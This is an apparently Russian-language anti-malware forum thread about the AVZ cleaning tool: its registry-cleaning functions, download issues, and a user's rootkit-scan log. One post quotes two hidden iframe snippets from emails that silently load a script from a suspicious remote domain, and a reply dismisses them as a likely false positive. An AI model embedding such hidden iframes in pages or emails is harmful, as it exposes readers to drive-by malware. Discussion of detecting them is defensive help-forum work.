Есть и у нас такое.
Printable View
Есть и у нас такое.
[QUOTE=surok;408639]
Или при чистке реестра функцией ExecuteSysClean удаляется весь CLSID в котором был зарегистрирован этот файл и DelCLSID уже не нужна?[/QUOTE]
имхо, не надо полностью полагаться на ExecuteSysClean, практика показывает, что для AVZ 4.30 DelCLSID применять надо.
[QUOTE=Pili;408815]практика показывает, что для AVZ 4.30 DelCLSID применять надо.[/QUOTE]
И для AVZ 4.32 тоже... ;)
[QUOTE]AVZ 4.30 DelCLSID применять надо. [/QUOTE]
С этим согласен.
А вот DelBHO я так и не понял, работает ли вообще? :) В логе тыкаешь на это, а бесполезно ))
Всё равно приходится в Хиджаке фиксить.
[QUOTE=light59;408852]А вот DelBHO я так и не понял, работает ли вообще?[/QUOTE]
Вообще работает )
DelBHO, как я понял, удаляет только из
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\[/CODE]
И не удаляет из
[CODE]HKEY_CLASSES_ROOT\CLSID\[/CODE]
Хотя очень часто, то что прописано в ВНО, находится и CLSID, например от MyCenria есть в
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}[/CODE]
и в [CODE]HKEY_CLASSES_ROOT\CLSID\{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}[/CODE]
Однако по логам AVZ предлагает только
[CODE] DelBHO('{FFFC57DB-1DE3-4303-B24D-CEE6DCDD3D86}');[/CODE]
А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?
[QUOTE=gjf;409025]А ExecuteRepair(1) восстанавливает ассоциации scr-файлов?[/QUOTE]
Да
[size="1"][color="#666686"][B][I]Добавлено через 1 минуту[/I][/B][/color][/size]
[QUOTE=Pili;408872]Вообще работает )
DelBHO, как я понял, удаляет только из
[CODE]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\[/CODE]
[/QUOTE]
Именно так и есть. DelCLSID идет начиная от CLSID - прибивает его (класс в результате уже не загрузится) и зачищает ссылки на него в основных известных местах. В то время как DelBHO только удаляет BHO и ничего более не делает
[QUOTE=Aleksandra;408820]И для AVZ 4.32 тоже... [/QUOTE]
А что это за версия такая, можно поинтересоваться?? :?
[QUOTE=vistaorxpmoy;409235]А что это за версия такая, можно поинтересоваться?? :?[/QUOTE]
[url]http://rapidshare.com/files/231459517/special_avz.zip[/url] - полиморфный AVZ 4.32 от 05.05.2009.
А основная версия будет обновляться?
Будет ли она полиморфной?
Народ, а что, RSS-лента по теме не работает (ссылку нашёл, но тема пустая)?
Нельзя ли попросить админа её включить - а то с подпиской какие-то глюки в последнее время...?
Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции!
[QUOTE=Multur;409637]Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции![/QUOTE]
По какой ссылке скачиваешь архив ?
Программу не нужно устанавливать, после распаковки запускаешь файл "Avz.exe" - всё. Программа работает.
Антивирусный плагин AVZ для The Bat не реагирует на следующую вещь в HTML письмах - ни при получении письма, ни при принудительной проверке папок почтовых ящиков на вирусы (изнутри Бата):
[CODE]<iframe qhdik='gvSDpyE9' src='http://javacsript.biz/in/in.cgi?2 ' jstuj='9lPaDk9P' width='57' height='296' style='display:none'></iframe>[/CODE]
или
[CODE]<iframe cerob='l5hSVJLW' src='http://javacsript.biz/in/in.cgi?2 ' mbmko='imTSb040' width='0' height='0' style='display:none'></iframe>[/CODE]
Бат версия 4.1.11.2 RC2.
Так и должно быть?
И что с этим делать?
P.S.: Avast письма с этим кодом считает зловредными. :O
[QUOTE=Multur;409637]Скачат архив AVZ4? распаковываю все ровно, начинаю устанавливать а он вообще ни какой реакции![/QUOTE
Аналогичная проблема..Пытаюсь запустить avz.exe - ни какой реакции..
Архив взял сегодня здесь [url]http://z-oleg.com/avz4.zip[/url]
(Для справки - на моём компе стоит ос Windows XP Professional SP2)
:(
[B]Filippossi[/B], попробуйте этот AVZ: [url]http://narod.ru/disk/9487011000/avz-poly.exe.html[/url] (это более свежая версия AVZ, но в ней не обновляются базы).
Доктор, меня все игнорируют :(
Следующий! :)
Nick222, avz и не должен на это реагировать. Так что в этом плане всё нормально.
К тому же, в данном случае, просто ложное срабатывание avast. Нельзя ругаться на все iframe, есть и безвредные ведь ;)
P.s. Желательно, в почтовом клиенте запретить html ;) Только текст разрешить ;)
Здравствуйте!
Заранее извиняюсь, если не в ту тему.
Подскажите пожалуйста, что это значит, (особено маскировка процессов и драйверов):
Выполняется стандартный скрипт: 1. Поиск и нейтрализации RootKit UserMode и KernelMode
1.1 Поиск перехватчиков API, работающих в UserMode
Анализ kernel32.dll, таблица экспорта найдена в секции .text
Анализ ntdll.dll, таблица экспорта найдена в секции .text
Анализ user32.dll, таблица экспорта найдена в секции .text
Анализ advapi32.dll, таблица экспорта найдена в секции .text
Анализ ws2_32.dll, таблица экспорта найдена в секции .text
Анализ wininet.dll, таблица экспорта найдена в секции .text
Анализ rasapi32.dll, таблица экспорта найдена в секции .text
Анализ urlmon.dll, таблица экспорта найдена в секции .text
Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.2 Поиск перехватчиков API, работающих в KernelMode
Драйвер успешно загружен
SDT найдена (RVA=137B00)
Ядро ntkrnlpa.exe обнаружено в памяти по адресу 81A34000
SDT = 81B6BB00
KiST = 81AEC8E0 (391)
Проверено функций: 391, перехвачено: 0, восстановлено: 0
1.3 Проверка IDT и SYSENTER
Анализ для процессора 1
Анализ для процессора 2
Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
Маскировка процесса с PID=476, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 476)
Маскировка процесса с PID=588, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 588)
Маскировка процесса с PID=652, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 652)
Маскировка процесса с PID=1116, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1116)
Маскировка процесса с PID=1764, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1764)
Маскировка процесса с PID=1928, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1928)
Маскировка процесса с PID=220, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 220)
Маскировка процесса с PID=348, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 348)
Маскировка процесса с PID=1720, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1720)
Маскировка процесса с PID=2052, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2052)
Маскировка процесса с PID=2084, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2084)
Маскировка процесса с PID=2536, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2536)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3740, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3740)
Маскировка процесса с PID=3864, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3864)
Маскировка процесса с PID=3340, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3340)
Маскировка процесса с PID=3356, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3356)
Маскировка процесса с PID=3456, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3456)
Маскировка процесса с PID=3532, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3532)
Маскировка процесса с PID=3716, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3716)
Маскировка процесса с PID=3888, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3888)
Маскировка процесса с PID=156, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 156)
Маскировка процесса с PID=3228, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3228)
Маскировка процесса с PID=2128, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2128)
Маскировка процесса с PID=1404, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1404)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=1296, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1296)
Маскировка процесса с PID=312, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 312)
Маскировка процесса с PID=2856, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2856)
Маскировка процесса с PID=3104, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3104)
Маскировка процесса с PID=3968, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3968)
Маскировка процесса с PID=2180, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2180)
Маскировка процесса с PID=1672, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1672)
Маскировка процесса с PID=3432, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3432)
Маскировка процесса с PID=1236, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1236)
Маскировка процесса с PID=2148, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2148)
Маскировка процесса с PID=3732, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3732)
Маскировка процесса с PID=3416, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 3416)
Поиск маскировки процессов и драйверов завершен
Драйвер успешно загружен
1.5 Проверка обработчиков IRP
Проверка завершена
Спасибо!!!!
Сервер или Виста? Для них это вполне нормально. Какие-то короткоживущие процессы, AVZ не успевает получить о них информацию.